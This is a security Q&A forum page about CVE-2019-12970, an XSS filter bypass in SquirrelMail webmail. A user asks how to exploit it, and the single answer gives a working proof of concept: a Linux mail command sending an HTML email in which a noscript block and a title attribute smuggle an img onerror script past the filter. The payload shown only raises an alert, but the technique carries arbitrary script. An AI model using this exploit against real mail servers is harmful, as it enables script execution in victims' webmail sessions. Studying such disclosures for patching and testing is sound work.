Remember

Register

Techbypass Let's Bypass

Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

Questions
Unanswered
Tags
Users
Ask a Question

Need any help mail to [email protected]

How can I bypass the SquirrelMail XSS script filter (CVE-2019-12970)?

0 votes

How can I exploit my SquirrelMail against this CVE-2019-12970?

xss
cve-2019-12970
squirrelmail

asked Jul 2, 2019 by onto (169 points)

Please log in or register to answer this question.

1 Answer

0 votes

To exploit this you need to use the Linux mail command. Like this

mail -a "Content-type: text/html" -s "My little pony" \
[email protected] <<EOD
<html><head></head><body>
<noscript>
<p title="</noscript><img src=x onerror=alert(2)>"></p>
</noscript>
</body></html>
EOD

answered Jul 2, 2019 by codeshikari (277 points)

Please log in or register to add a comment.

Security
Cookie Policy

| Snow Theme by Q2A Market

Powered by Question2Answer

...